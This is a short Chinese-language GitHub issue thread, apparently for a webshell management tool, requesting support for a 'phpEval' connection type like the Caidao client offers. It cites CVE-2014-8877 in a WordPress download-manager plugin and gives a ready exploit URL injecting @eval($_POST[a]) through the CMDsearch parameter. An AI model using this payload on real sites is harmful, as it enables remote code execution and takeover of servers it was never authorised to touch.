Shell管理功能改进 #36
Comments
|
wtf? |
|
不好意思,不知怎么变成乱码了。 |
|
WordPress CM Download Manager插件远程PHP代码执行漏洞(CVE-2014-8877) |
|
这应该跟我在一个issue里说的情况一样。作者还是在服务端代码兼容各种环境上测试不够全面,这一点菜刀做的很好。 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
URL :http://target.com/cmdownloads/?CMDsearch=".@eval($_POST[a])."
PASS: a
TYPE: phpEval
这种类型的不支持,菜刀是支持的。可以改进支持。
The text was updated successfully, but these errors were encountered: